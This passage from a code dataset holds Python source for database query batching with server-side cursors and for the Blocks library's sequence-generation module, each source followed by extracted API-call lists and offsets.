    """A batch for plain SELECT statements, executed through a named (server-side) cursor."""

    def __init__(self, batch_text: str, ordinal: int, selection: SelectionData, batch_events: SelectBatchEvents, storage_type: ResultSetStorageType) -> None:
        super().__init__(batch_text, ordinal, selection, batch_events, storage_type)

    def get_cursor(self, connection: ServerConnection):
        # Named cursors can be created only in a transaction. As our connection has
        # autocommit set to true there is no transaction concept with it, so we need
        # withhold=True; the cursor is local and explicitly closed, so this is safe.
        server_side_name = str(uuid.uuid4())
        return connection.cursor(name=server_side_name, withhold=True)

    def after_execute(self, cursor) -> None:
        super().create_result_set(cursor)
def create_result_set(storage_type: ResultSetStorageType, result_set_id: int, batch_id: int) -> ResultSet:
    """Build a result set backed by file storage or memory per storage_type."""
    if storage_type is not ResultSetStorageType.FILE_STORAGE:
        return InMemoryResultSet(result_set_id, batch_id)
    return FileStorageResultSet(result_set_id, batch_id)
def create_batch(batch_text: str, ordinal: int, selection: SelectionData, batch_events: BatchEvents, storage_type: ResultSetStorageType) -> Batch:
    """Create a Batch, preferring SelectBatch for plain SELECT statements.

    SELECT INTO and CTE statements cannot run through a named cursor, so they
    fall back to the generic Batch implementation.
    """
    statement = sqlparse.parse(batch_text)[0]
    if statement.get_type().lower() == 'select':
        has_into = any(token.normalized == 'INTO' for token in statement.tokens)
        has_cte = any(token.ttype == sqlparse.tokens.Keyword.CTE for token in statement.tokens)
        if not has_into and not has_cte:
            return SelectBatch(batch_text, ordinal, selection, batch_events, storage_type)
    return Batch(batch_text, ordinal, selection, batch_events, storage_type)
| [
"ossdbtoolsservice.utils.time.get_elapsed_time_str",
"ossdbtoolsservice.query.contracts.BatchSummary.from_batch",
"uuid.uuid4",
"datetime.datetime.now",
"ossdbtoolsservice.query.file_storage_result_set.FileStorageResultSet",
"ossdbtoolsservice.query.in_memory_result_set.InMemoryResultSet",
"ossdbtoolsse... | [((7119, 7161), 'ossdbtoolsservice.query.in_memory_result_set.InMemoryResultSet', 'InMemoryResultSet', (['result_set_id', 'batch_id'], {}), '(result_set_id, batch_id)\n', (7136, 7161), False, 'from ossdbtoolsservice.query.in_memory_result_set import InMemoryResultSet\n'), ((7321, 7347), 'sqlparse.parse', 'sqlparse.parse', (['batch_text'], {}), '(batch_text)\n', (7335, 7347), False, 'import sqlparse\n'), ((2552, 2581), 'ossdbtoolsservice.query.contracts.BatchSummary.from_batch', 'BatchSummary.from_batch', (['self'], {}), '(self)\n', (2575, 2581), False, 'from ossdbtoolsservice.query.contracts import BatchSummary, SaveResultsRequestParams, SelectionData\n'), ((2986, 3026), 'ossdbtoolsservice.utils.time.get_time_str', 'get_time_str', (['self._execution_start_time'], {}), '(self._execution_start_time)\n', (2998, 3026), False, 'from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str\n'), ((3088, 3126), 'ossdbtoolsservice.utils.time.get_time_str', 'get_time_str', (['self._execution_end_time'], {}), '(self._execution_end_time)\n', (3100, 3126), False, 'from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str\n'), ((3192, 3266), 'ossdbtoolsservice.utils.time.get_elapsed_time_str', 'get_elapsed_time_str', (['self._execution_start_time', 'self._execution_end_time'], {}), '(self._execution_start_time, self._execution_end_time)\n', (3212, 3266), False, 'from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str\n'), ((3937, 3951), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3949, 3951), False, 'from datetime import datetime\n'), ((7061, 7106), 'ossdbtoolsservice.query.file_storage_result_set.FileStorageResultSet', 'FileStorageResultSet', (['result_set_id', 'batch_id'], {}), '(result_set_id, batch_id)\n', (7081, 7106), False, 'from ossdbtoolsservice.query.file_storage_result_set import FileStorageResultSet\n'), ((4913, 4927), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', 
(4925, 4927), False, 'from datetime import datetime\n'), ((6437, 6449), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6447, 6449), False, 'import uuid\n')] |
"""Sequence generation framework.
Recurrent networks are often used to generate/model sequences.
Examples include language modelling, machine translation, handwriting
synthesis, etc.. A typical pattern in this context is that
sequence elements are generated one often another, and every generated
element is fed back into the recurrent network state. Sometimes
also an attention mechanism is used to condition sequence generation
on some structured input like another sequence or an image.
This module provides :class:`SequenceGenerator` that builds a sequence
generating network from three main components:
* a core recurrent transition, e.g. :class:`~blocks.bricks.recurrent.LSTM`
or :class:`~blocks.bricks.recurrent.GatedRecurrent`
* a readout component that can produce sequence elements using
the network state and the information from the attention mechanism
* an attention mechanism (see :mod:`~blocks.bricks.attention` for
more information)
Implementation-wise :class:`SequenceGenerator` fully relies on
:class:`BaseSequenceGenerator`. At the level of the latter an
attention is mandatory, moreover it must be a part of the recurrent
transition (see :class:`~blocks.bricks.attention.AttentionRecurrent`).
To simulate optional attention, :class:`SequenceGenerator` wraps the
pure recurrent network in :class:`FakeAttentionRecurrent`.
"""
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from theano import tensor
from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax
from blocks.bricks.base import application, Brick, lazy
from blocks.bricks.parallel import Fork, Merge
from blocks.bricks.lookup import LookupTable
from blocks.bricks.recurrent import recurrent
from blocks.bricks.attention import (
AbstractAttentionRecurrent, AttentionRecurrent)
from blocks.roles import add_role, COST
from blocks.utils import dict_union, dict_subset
class BaseSequenceGenerator(Initializable):
    r"""A generic sequence generator.
    This class combines two components, a readout network and an
    attention-equipped recurrent transition, into a context-dependent
    sequence generator. Third component must be also given which
    forks feedback from the readout network to obtain inputs for the
    transition.
    The class provides two methods: :meth:`generate` and :meth:`cost`. The
    former is to actually generate sequences and the latter is to compute
    the cost of generating given sequences.
    The generation algorithm description follows.
    **Definitions and notation:**
    * States :math:`s_i` of the generator are the states of the transition
      as specified in `transition.state_names`.
    * Contexts of the generator are the contexts of the
      transition as specified in `transition.context_names`.
    * Glimpses :math:`g_i` are intermediate entities computed at every
      generation step from states, contexts and the previous step glimpses.
      They are computed in the transition's `apply` method when not given
      or by explicitly calling the transition's `take_glimpses` method. The
      set of glimpses considered is specified in
      `transition.glimpse_names`.
    * Outputs :math:`y_i` are produced at every step and form the output
      sequence. A generation cost :math:`c_i` is assigned to each output.
    **Algorithm:**
    1. Initialization.
       .. math::
           y_0 = readout.initial\_outputs(contexts)\\
           s_0, g_0 = transition.initial\_states(contexts)\\
           i = 1\\
       By default all recurrent bricks from :mod:`~blocks.bricks.recurrent`
       have trainable initial states initialized with zeros. Subclass them
       or :class:`~blocks.bricks.recurrent.BaseRecurrent` directly to get
       custom initial states.
    2. New glimpses are computed:
       .. math:: g_i = transition.take\_glimpses(
           s_{i-1}, g_{i-1}, contexts)
    3. A new output is generated by the readout and its cost is
       computed:
       .. math::
           f_{i-1} = readout.feedback(y_{i-1}) \\
           r_i = readout.readout(f_{i-1}, s_{i-1}, g_i, contexts) \\
           y_i = readout.emit(r_i) \\
           c_i = readout.cost(r_i, y_i)
       Note that the *new* glimpses and the *old* states are used at this
       step. The reason for not merging all readout methods into one is
       to make an efficient implementation of :meth:`cost` possible.
    4. New states are computed and iteration is done:
       .. math::
           f_i = readout.feedback(y_i) \\
           s_i = transition.compute\_states(s_{i-1}, g_i,
               fork.apply(f_i), contexts) \\
           i = i + 1
    5. Back to step 2 if the desired sequence
       length has not been yet reached.
    | A scheme of the algorithm described above follows.
    .. image:: /_static/sequence_generator_scheme.png
            :height: 500px
            :width: 500px
    ..
    Parameters
    ----------
    readout : instance of :class:`AbstractReadout`
        The readout component of the sequence generator.
    transition : instance of :class:`AbstractAttentionRecurrent`
        The transition component of the sequence generator.
    fork : :class:`~.bricks.Brick`
        The brick to compute the transition's inputs from the feedback.
    See Also
    --------
    :class:`.Initializable` : for initialization parameters
    :class:`SequenceGenerator` : more user friendly interface to this\
        brick
    """
    @lazy()
    def __init__(self, readout, transition, fork, **kwargs):
        self.readout = readout
        self.transition = transition
        self.fork = fork
        # Register the three components as children so that allocation
        # and initialization configuration is pushed down to them.
        children = [self.readout, self.fork, self.transition]
        kwargs.setdefault('children', []).extend(children)
        super(BaseSequenceGenerator, self).__init__(**kwargs)
    @property
    def _state_names(self):
        # State names are whatever the transition's `compute_states` emits.
        return self.transition.compute_states.outputs
    @property
    def _context_names(self):
        # Context names are taken from the transition's `apply` contract.
        return self.transition.apply.contexts
    @property
    def _glimpse_names(self):
        # Glimpse names are whatever the transition's `take_glimpses` emits.
        return self.transition.take_glimpses.outputs
    def _push_allocation_config(self):
        # Configure readout. That involves `get_dim` requests
        # to the transition. To make sure that it answers
        # correctly we should finish its configuration first.
        self.transition.push_allocation_config()
        transition_sources = (self._state_names + self._context_names +
                              self._glimpse_names)
        self.readout.source_dims = [self.transition.get_dim(name)
                                    if name in transition_sources
                                    else self.readout.get_dim(name)
                                    for name in self.readout.source_names]
        # Configure fork. For similar reasons as outlined above,
        # first push `readout` configuration.
        self.readout.push_allocation_config()
        feedback_name, = self.readout.feedback.outputs
        self.fork.input_dim = self.readout.get_dim(feedback_name)
        self.fork.output_dims = self.transition.get_dims(
            self.fork.apply.outputs)
    @application
    def cost(self, application_call, outputs, mask=None, **kwargs):
        """Returns the average cost over the minibatch.
        The cost is computed by averaging the sum of per token costs for
        each sequence over the minibatch.
        .. warning::
            Note that, the computed cost can be problematic when batches
            consist of vastly different sequence lengths.
        Parameters
        ----------
        outputs : :class:`~tensor.TensorVariable`
            The 3(2) dimensional tensor containing output sequences.
            The axis 0 must stand for time, the axis 1 for the
            position in the batch.
        mask : :class:`~tensor.TensorVariable`
            The binary matrix identifying fake outputs.
        Returns
        -------
        cost : :class:`~tensor.Variable`
            Theano variable for cost, computed by summing over timesteps
            and then averaging over the minibatch.
        Notes
        -----
        The contexts are expected as keyword arguments.
        Adds average cost per sequence element `AUXILIARY` variable to
        the computational graph with name ``per_sequence_element``.
        """
        # Compute the sum of costs
        costs = self.cost_matrix(outputs, mask=mask, **kwargs)
        # Sum over time (axis 0), then average over the batch.
        cost = tensor.mean(costs.sum(axis=0))
        add_role(cost, COST)
        # Add auxiliary variable for per sequence element cost
        application_call.add_auxiliary_variable(
            (costs.sum() / mask.sum()) if mask is not None else costs.mean(),
            name='per_sequence_element')
        return cost
    @application
    def cost_matrix(self, application_call, outputs, mask=None, **kwargs):
        """Returns generation costs for output sequences.
        See Also
        --------
        :meth:`cost` : Scalar cost.
        """
        # We assume the data has axes (time, batch, features, ...)
        batch_size = outputs.shape[1]
        # Prepare input for the iterative part
        states = dict_subset(kwargs, self._state_names, must_have=False)
        # masks in context are optional (e.g. `attended_mask`)
        contexts = dict_subset(kwargs, self._context_names, must_have=False)
        feedback = self.readout.feedback(outputs)
        inputs = self.fork.apply(feedback, as_dict=True)
        # Run the recurrent network
        results = self.transition.apply(
            mask=mask, return_initial_states=True, as_dict=True,
            **dict_union(inputs, states, contexts))
        # Separate the deliverables. The last states are discarded: they
        # are not used to predict any output symbol. The initial glimpses
        # are discarded because they are not used for prediction.
        # Remember, glimpses are computed _before_ output stage, states are
        # computed after.
        states = {name: results[name][:-1] for name in self._state_names}
        glimpses = {name: results[name][1:] for name in self._glimpse_names}
        # Compute the cost
        # Shift outputs' feedback one step forward in time so that position
        # i holds the feedback of output i-1; position 0 gets the feedback
        # of the initial outputs.
        feedback = tensor.roll(feedback, 1, 0)
        feedback = tensor.set_subtensor(
            feedback[0],
            self.readout.feedback(self.readout.initial_outputs(batch_size)))
        readouts = self.readout.readout(
            feedback=feedback, **dict_union(states, glimpses, contexts))
        costs = self.readout.cost(readouts, outputs)
        if mask is not None:
            costs *= mask
        # Expose intermediate states and glimpses for monitoring.
        for name, variable in list(glimpses.items()) + list(states.items()):
            application_call.add_auxiliary_variable(
                variable.copy(), name=name)
        # This variables can be used to initialize the initial states of the
        # next batch using the last states of the current batch.
        for name in self._state_names + self._glimpse_names:
            application_call.add_auxiliary_variable(
                results[name][-1].copy(), name=name+"_final_value")
        return costs
    @recurrent
    def generate(self, outputs, **kwargs):
        """A sequence generation step.
        Parameters
        ----------
        outputs : :class:`~tensor.TensorVariable`
            The outputs from the previous step.
        Notes
        -----
        The contexts, previous states and glimpses are expected as keyword
        arguments.
        """
        states = dict_subset(kwargs, self._state_names)
        # masks in context are optional (e.g. `attended_mask`)
        contexts = dict_subset(kwargs, self._context_names, must_have=False)
        glimpses = dict_subset(kwargs, self._glimpse_names)
        # Step 2 of the algorithm: new glimpses from old states/glimpses.
        next_glimpses = self.transition.take_glimpses(
            as_dict=True, **dict_union(states, glimpses, contexts))
        # Step 3: readout uses *new* glimpses but *old* states.
        next_readouts = self.readout.readout(
            feedback=self.readout.feedback(outputs),
            **dict_union(states, next_glimpses, contexts))
        next_outputs = self.readout.emit(next_readouts)
        next_costs = self.readout.cost(next_readouts, next_outputs)
        next_feedback = self.readout.feedback(next_outputs)
        next_inputs = (self.fork.apply(next_feedback, as_dict=True)
                       if self.fork else {'feedback': next_feedback})
        # Step 4: advance the recurrent states.
        next_states = self.transition.compute_states(
            as_list=True,
            **dict_union(next_inputs, states, next_glimpses, contexts))
        return (next_states + [next_outputs] +
                list(next_glimpses.values()) + [next_costs])
    @generate.delegate
    def generate_delegate(self):
        # Sequence/context signatures of `generate` mirror the transition.
        return self.transition.apply
    @generate.property('states')
    def generate_states(self):
        return self._state_names + ['outputs'] + self._glimpse_names
    @generate.property('outputs')
    def generate_outputs(self):
        return (self._state_names + ['outputs'] +
                self._glimpse_names + ['costs'])
    def get_dim(self, name):
        # Dimensions of states/contexts/glimpses come from the transition;
        # the output dimension comes from the readout.
        if name in (self._state_names + self._context_names +
                    self._glimpse_names):
            return self.transition.get_dim(name)
        elif name == 'outputs':
            return self.readout.get_dim(name)
        return super(BaseSequenceGenerator, self).get_dim(name)
    @application
    def initial_states(self, batch_size, *args, **kwargs):
        # TODO: support dict of outputs for application methods
        # to simplify this code.
        state_dict = dict(
            self.transition.initial_states(
                batch_size, as_dict=True, *args, **kwargs),
            outputs=self.readout.initial_outputs(batch_size))
        return [state_dict[state_name]
                for state_name in self.generate.states]
    @initial_states.property('outputs')
    def initial_states_outputs(self):
        return self.generate.states
@add_metaclass(ABCMeta)
class AbstractReadout(Initializable):
    """The interface for the readout component of a sequence generator.
    The readout component of a sequence generator is a bridge between
    the core recurrent network and the output sequence.
    Parameters
    ----------
    source_names : list
        A list of the source names (outputs) that are needed for the
        readout part e.g. ``['states']`` or
        ``['states', 'weighted_averages']`` or ``['states', 'feedback']``.
    readout_dim : int
        The dimension of the readout.
    Attributes
    ----------
    source_names : list
    readout_dim : int
    See Also
    --------
    :class:`BaseSequenceGenerator` : see how exactly a readout is used
    :class:`Readout` : the typically used readout brick
    """
    @lazy(allocation=['source_names', 'readout_dim'])
    def __init__(self, source_names, readout_dim, **kwargs):
        self.source_names = source_names
        self.readout_dim = readout_dim
        super(AbstractReadout, self).__init__(**kwargs)
    @abstractmethod
    def emit(self, readouts):
        """Produce outputs from readouts.
        Parameters
        ----------
        readouts : :class:`~theano.Variable`
            Readouts produced by the :meth:`readout` method of
            a `(batch_size, readout_dim)` shape.
        """
        pass
    @abstractmethod
    def cost(self, readouts, outputs):
        """Compute generation cost of outputs given readouts.
        Parameters
        ----------
        readouts : :class:`~theano.Variable`
            Readouts produced by the :meth:`readout` method
            of a `(..., readout dim)` shape.
        outputs : :class:`~theano.Variable`
            Outputs whose cost should be computed. Should have as many
            or one less dimensions compared to `readout`. If readout has
            `n` dimensions, first `n - 1` dimensions of `outputs` should
            match with those of `readouts`.
        """
        pass
    @abstractmethod
    def initial_outputs(self, batch_size):
        """Compute initial outputs for the generator's first step.
        In the notation from the :class:`BaseSequenceGenerator`
        documentation this method should compute :math:`y_0`.
        """
        pass
    @abstractmethod
    def readout(self, **kwargs):
        r"""Compute the readout vector from states, glimpses, etc.
        Parameters
        ----------
        \*\*kwargs: dict
            Contains sequence generator states, glimpses,
            contexts and feedback from the previous outputs.
        """
        pass
    @abstractmethod
    def feedback(self, outputs):
        """Feeds outputs back to be used as inputs of the transition."""
        pass
class Readout(AbstractReadout):
    r"""Readout brick with separated emitter and feedback parts.
    :class:`Readout` combines a few bits and pieces into an object
    that can be used as the readout component in
    :class:`BaseSequenceGenerator`. This includes an emitter brick,
    to which :meth:`emit`, :meth:`cost` and :meth:`initial_outputs`
    calls are delegated, a feedback brick to which :meth:`feedback`
    functionality is delegated, and a pipeline to actually compute
    readouts from all the sources (see the `source_names` attribute
    of :class:`AbstractReadout`).
    The readout computation pipeline is constructed from `merge` and
    `post_merge` brick, whose responsibilites are described in the
    respective docstrings.
    Parameters
    ----------
    emitter : an instance of :class:`AbstractEmitter`
        The emitter component.
    feedback_brick : an instance of :class:`AbstractFeedback`
        The feedback component.
    merge : :class:`~.bricks.Brick`, optional
        A brick that takes the sources given in `source_names` as an input
        and combines them into a single output. If given, `merge_prototype`
        cannot be given.
    merge_prototype : :class:`.FeedForward`, optional
        If `merge` isn't given, the transformation given by
        `merge_prototype` is applied to each input before being summed. By
        default a :class:`.Linear` transformation without biases is used.
        If given, `merge` cannot be given.
    post_merge : :class:`.Feedforward`, optional
        This transformation is applied to the merged inputs. By default
        :class:`.Bias` is used.
    merged_dim : int, optional
        The input dimension of `post_merge` i.e. the output dimension of
        `merge` (or `merge_prototype`). If not give, it is assumed to be
        the same as `readout_dim` (i.e. `post_merge` is assumed to not
        change dimensions).
    \*\*kwargs : dict
        Passed to the parent's constructor.
    See Also
    --------
    :class:`BaseSequenceGenerator` : see how exactly a readout is used
    :class:`AbstractEmitter`, :class:`AbstractFeedback`
    """
    def __init__(self, emitter=None, feedback_brick=None,
                 merge=None, merge_prototype=None,
                 post_merge=None, merged_dim=None, **kwargs):
        # Fill in trivial defaults for any component not provided.
        if not emitter:
            emitter = TrivialEmitter(kwargs['readout_dim'])
        if not feedback_brick:
            feedback_brick = TrivialFeedback(kwargs['readout_dim'])
        if not merge:
            merge = Merge(input_names=kwargs['source_names'],
                          prototype=merge_prototype)
        if not post_merge:
            post_merge = Bias(dim=kwargs['readout_dim'])
        if not merged_dim:
            merged_dim = kwargs['readout_dim']
        self.emitter = emitter
        self.feedback_brick = feedback_brick
        self.merge = merge
        self.post_merge = post_merge
        self.merged_dim = merged_dim
        children = [self.emitter, self.feedback_brick, self.merge,
                    self.post_merge]
        kwargs.setdefault('children', []).extend(children)
        super(Readout, self).__init__(**kwargs)
    def _push_allocation_config(self):
        # Propagate dimensions to the child bricks before allocation.
        self.emitter.readout_dim = self.get_dim('readouts')
        self.feedback_brick.output_dim = self.get_dim('outputs')
        self.merge.input_names = self.source_names
        self.merge.input_dims = self.source_dims
        self.merge.output_dim = self.merged_dim
        self.post_merge.input_dim = self.merged_dim
        self.post_merge.output_dim = self.readout_dim
    @application
    def readout(self, **kwargs):
        # Combine the requested sources, then apply the post-merge
        # transformation to obtain the readout vector.
        merged = self.merge.apply(**{name: kwargs[name]
                                     for name in self.merge.input_names})
        merged = self.post_merge.apply(merged)
        return merged
    @application
    def emit(self, readouts):
        # Delegated to the emitter component.
        return self.emitter.emit(readouts)
    @application
    def cost(self, readouts, outputs):
        # Delegated to the emitter component.
        return self.emitter.cost(readouts, outputs)
    @application
    def initial_outputs(self, batch_size):
        # Delegated to the emitter component.
        return self.emitter.initial_outputs(batch_size)
    @application(outputs=['feedback'])
    def feedback(self, outputs):
        # Delegated to the feedback component.
        return self.feedback_brick.feedback(outputs)
    def get_dim(self, name):
        if name == 'outputs':
            return self.emitter.get_dim(name)
        elif name == 'feedback':
            return self.feedback_brick.get_dim(name)
        elif name == 'readouts':
            return self.readout_dim
        return super(Readout, self).get_dim(name)
@add_metaclass(ABCMeta)
class AbstractEmitter(Brick):
    """The interface for the emitter component of a readout.
    Attributes
    ----------
    readout_dim : int
        The dimension of the readout. Is given by the
        :class:`Readout` brick when allocation configuration
        is pushed.
    See Also
    --------
    :class:`Readout`
    :class:`SoftmaxEmitter` : for integer outputs
    Notes
    -----
    An important detail about the emitter cost is that it will be
    evaluated with inputs of different dimensions so it has to be
    flexible enough to handle this. The two ways in which it can be
    applied are:
    1. In :meth:BaseSequenceGenerator.cost_matrix where it will
    be applied to the whole sequence at once.
    2. In :meth:BaseSequenceGenerator.generate where it will be
    applied to only one step of the sequence.
    """
    @abstractmethod
    def emit(self, readouts):
        """Implements the respective method of :class:`Readout`."""
        pass
    @abstractmethod
    def cost(self, readouts, outputs):
        """Implements the respective method of :class:`Readout`."""
        pass
    @abstractmethod
    def initial_outputs(self, batch_size):
        """Implements the respective method of :class:`Readout`."""
        pass
@add_metaclass(ABCMeta)
class AbstractFeedback(Brick):
    """The interface for the feedback component of a readout.
    See Also
    --------
    :class:`Readout`
    :class:`LookupFeedback` for integer outputs
    """
    @abstractmethod
    def feedback(self, outputs):
        """Implements the respective method of :class:`Readout`."""
        pass
class TrivialEmitter(AbstractEmitter):
    """An emitter for the trivial case when readouts are outputs.
    Parameters
    ----------
    readout_dim : int
        The dimension of the readout.
    Notes
    -----
    By default :meth:`cost` always returns zero tensor.
    """
    @lazy(allocation=['readout_dim'])
    def __init__(self, readout_dim, **kwargs):
        super(TrivialEmitter, self).__init__(**kwargs)
        self.readout_dim = readout_dim
    @application
    def emit(self, readouts):
        # Identity emission: the readouts are the outputs themselves.
        return readouts
    @application
    def cost(self, readouts, outputs):
        # No meaningful cost in the trivial case: a zero tensor
        # shaped like `outputs`.
        return tensor.zeros_like(outputs)
    @application
    def initial_outputs(self, batch_size):
        # Generation starts from all-zero outputs.
        return tensor.zeros((batch_size, self.readout_dim))
    def get_dim(self, name):
        # Outputs have the same dimension as readouts.
        if name == 'outputs':
            return self.readout_dim
        return super(TrivialEmitter, self).get_dim(name)
class SoftmaxEmitter(AbstractEmitter, Initializable, Random):
    """A softmax emitter for the case of integer outputs.
    Interprets readout elements as energies corresponding to their indices.
    Parameters
    ----------
    initial_output : int or a scalar :class:`~theano.Variable`
        The initial output.
    """
    def __init__(self, initial_output=0, **kwargs):
        self.initial_output = initial_output
        self.softmax = NDimensionalSoftmax()
        children = [self.softmax]
        kwargs.setdefault('children', []).extend(children)
        super(SoftmaxEmitter, self).__init__(**kwargs)
    @application
    def probs(self, readouts):
        # Softmax over the last axis; extra_ndim handles readouts with
        # leading time/batch axes.
        return self.softmax.apply(readouts, extra_ndim=readouts.ndim - 2)
    @application
    def emit(self, readouts):
        # Sample one index per batch element from the categorical
        # distribution given by the softmax probabilities.
        probs = self.probs(readouts)
        batch_size = probs.shape[0]
        pvals_flat = probs.reshape((batch_size, -1))
        generated = self.theano_rng.multinomial(pvals=pvals_flat)
        return generated.reshape(probs.shape).argmax(axis=-1)
    @application
    def cost(self, readouts, outputs):
        # WARNING: unfortunately this application method works
        # just fine when `readouts` and `outputs` have
        # different dimensions. Be careful!
        return self.softmax.categorical_cross_entropy(
            outputs, readouts, extra_ndim=readouts.ndim - 2)
    @application
    def initial_outputs(self, batch_size):
        # A vector of `initial_output` repeated for the whole batch.
        return self.initial_output * tensor.ones((batch_size,), dtype='int64')
    def get_dim(self, name):
        # Outputs are scalar integer indices, hence dimension 0.
        if name == 'outputs':
            return 0
        return super(SoftmaxEmitter, self).get_dim(name)
class TrivialFeedback(AbstractFeedback):
    """A feedback brick for the case when readout are outputs."""
    @lazy(allocation=['output_dim'])
    def __init__(self, output_dim, **kwargs):
        super(TrivialFeedback, self).__init__(**kwargs)
        self.output_dim = output_dim
    @application(outputs=['feedback'])
    def feedback(self, outputs):
        # Identity feedback: the outputs are fed back unchanged.
        return outputs
    def get_dim(self, name):
        if name == 'feedback':
            return self.output_dim
        return super(TrivialFeedback, self).get_dim(name)
class LookupFeedback(AbstractFeedback, Initializable):
    """A feedback brick for the case when readout are integers.
    Stores and retrieves distributed representations of integers.
    """
    def __init__(self, num_outputs=None, feedback_dim=None, **kwargs):
        self.num_outputs = num_outputs
        self.feedback_dim = feedback_dim
        self.lookup = LookupTable(num_outputs, feedback_dim)
        children = [self.lookup]
        kwargs.setdefault('children', []).extend(children)
        super(LookupFeedback, self).__init__(**kwargs)
    def _push_allocation_config(self):
        self.lookup.length = self.num_outputs
        self.lookup.dim = self.feedback_dim
    @application
    def feedback(self, outputs):
        # `output_dim` is set by Readout._push_allocation_config; zero
        # means the outputs are scalar integer indices, which is the only
        # case a lookup table can embed.
        assert self.output_dim == 0
        return self.lookup.apply(outputs)
    def get_dim(self, name):
        if name == 'feedback':
            return self.feedback_dim
        return super(LookupFeedback, self).get_dim(name)
class FakeAttentionRecurrent(AbstractAttentionRecurrent, Initializable):
    """Adds fake attention interface to a transition.
    :class:`BaseSequenceGenerator` requires its transition brick to support
    :class:`~blocks.bricks.attention.AbstractAttentionRecurrent` interface,
    that is to have an embedded attention mechanism. For the cases when no
    attention is required (e.g. language modeling or encoder-decoder
    models), :class:`FakeAttentionRecurrent` is used to wrap a usual
    recurrent brick. The resulting brick has no glimpses and simply
    passes all states and contexts to the wrapped one.
    .. todo::
        Get rid of this brick and support attention-less transitions
        in :class:`BaseSequenceGenerator`.
    """
    def __init__(self, transition, **kwargs):
        self.transition = transition
        # Mirror the wrapped transition's interface; no glimpses at all.
        self.state_names = transition.apply.states
        self.context_names = transition.apply.contexts
        self.glimpse_names = []
        children = [self.transition]
        kwargs.setdefault('children', []).extend(children)
        super(FakeAttentionRecurrent, self).__init__(**kwargs)
    @application
    def apply(self, *args, **kwargs):
        # Pure pass-through to the wrapped transition.
        return self.transition.apply(*args, **kwargs)
    @apply.delegate
    def apply_delegate(self):
        return self.transition.apply
    @application
    def compute_states(self, *args, **kwargs):
        # One non-iterating step of the wrapped transition.
        return self.transition.apply(iterate=False, *args, **kwargs)
    @compute_states.delegate
    def compute_states_delegate(self):
        return self.transition.apply
    @application(outputs=[])
    def take_glimpses(self, *args, **kwargs):
        # No attention, hence no glimpses to take.
        return None
    @application
    def initial_states(self, batch_size, *args, **kwargs):
        return self.transition.initial_states(batch_size,
                                              *args, **kwargs)
    @initial_states.property('outputs')
    def initial_states_outputs(self):
        return self.transition.apply.states
    def get_dim(self, name):
        return self.transition.get_dim(name)
class SequenceGenerator(BaseSequenceGenerator):
    r"""A more user-friendly interface for :class:`BaseSequenceGenerator`.
    Parameters
    ----------
    readout : instance of :class:`AbstractReadout`
        The readout component for the sequence generator.
    transition : instance of :class:`.BaseRecurrent`
        The recurrent transition to be used in the sequence generator.
        Will be combined with `attention`, if that one is given.
    attention : object, optional
        The attention mechanism to be added to ``transition``,
        an instance of
        :class:`~blocks.bricks.attention.AbstractAttention`.
    add_contexts : bool
        If ``True``, the
        :class:`.AttentionRecurrent` wrapping the
        `transition` will add additional contexts for the attended and its
        mask.
    \*\*kwargs : dict
        All keywords arguments are passed to the base class. If `fork`
        keyword argument is not provided, :class:`.Fork` is created
        that forks all transition sequential inputs without a "mask"
        substring in them.
    """
    def __init__(self, readout, transition, attention=None,
                 add_contexts=True, **kwargs):
        # Fork every sequential input of the transition except the masks.
        normal_inputs = [name for name in transition.apply.sequences
                         if 'mask' not in name]
        kwargs.setdefault('fork', Fork(normal_inputs))
        # With attention, wrap the transition in an AttentionRecurrent;
        # without it, use FakeAttentionRecurrent so the base class still
        # sees the AbstractAttentionRecurrent interface.
        if attention:
            transition = AttentionRecurrent(
                transition, attention,
                add_contexts=add_contexts, name="att_trans")
        else:
            transition = FakeAttentionRecurrent(transition,
                                                  name="with_fake_attention")
        super(SequenceGenerator, self).__init__(
            readout, transition, **kwargs)
| [
"blocks.bricks.NDimensionalSoftmax",
"theano.tensor.roll",
"theano.tensor.ones",
"six.add_metaclass",
"blocks.utils.dict_union",
"blocks.bricks.Bias",
"blocks.bricks.base.lazy",
"theano.tensor.zeros_like",
"blocks.bricks.base.application",
"theano.tensor.zeros",
"blocks.roles.add_role",
"block... | [((13908, 13930), 'six.add_metaclass', 'add_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (13921, 13930), False, 'from six import add_metaclass\n'), ((21289, 21311), 'six.add_metaclass', 'add_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (21302, 21311), False, 'from six import add_metaclass\n'), ((22594, 22616), 'six.add_metaclass', 'add_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (22607, 22616), False, 'from six import add_metaclass\n'), ((5481, 5487), 'blocks.bricks.base.lazy', 'lazy', ([], {}), '()\n', (5485, 5487), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((14717, 14765), 'blocks.bricks.base.lazy', 'lazy', ([], {'allocation': "['source_names', 'readout_dim']"}), "(allocation=['source_names', 'readout_dim'])\n", (14721, 14765), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((20855, 20888), 'blocks.bricks.base.application', 'application', ([], {'outputs': "['feedback']"}), "(outputs=['feedback'])\n", (20866, 20888), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((23239, 23271), 'blocks.bricks.base.lazy', 'lazy', ([], {'allocation': "['readout_dim']"}), "(allocation=['readout_dim'])\n", (23243, 23271), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((25630, 25661), 'blocks.bricks.base.lazy', 'lazy', ([], {'allocation': "['output_dim']"}), "(allocation=['output_dim'])\n", (25634, 25661), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((25807, 25840), 'blocks.bricks.base.application', 'application', ([], {'outputs': "['feedback']"}), "(outputs=['feedback'])\n", (25818, 25840), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((28605, 28628), 'blocks.bricks.base.application', 'application', ([], {'outputs': '[]'}), '(outputs=[])\n', (28616, 28628), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((8513, 8533), 'blocks.roles.add_role', 'add_role', (['cost', 'COST'], {}), '(cost, COST)\n', (8521, 
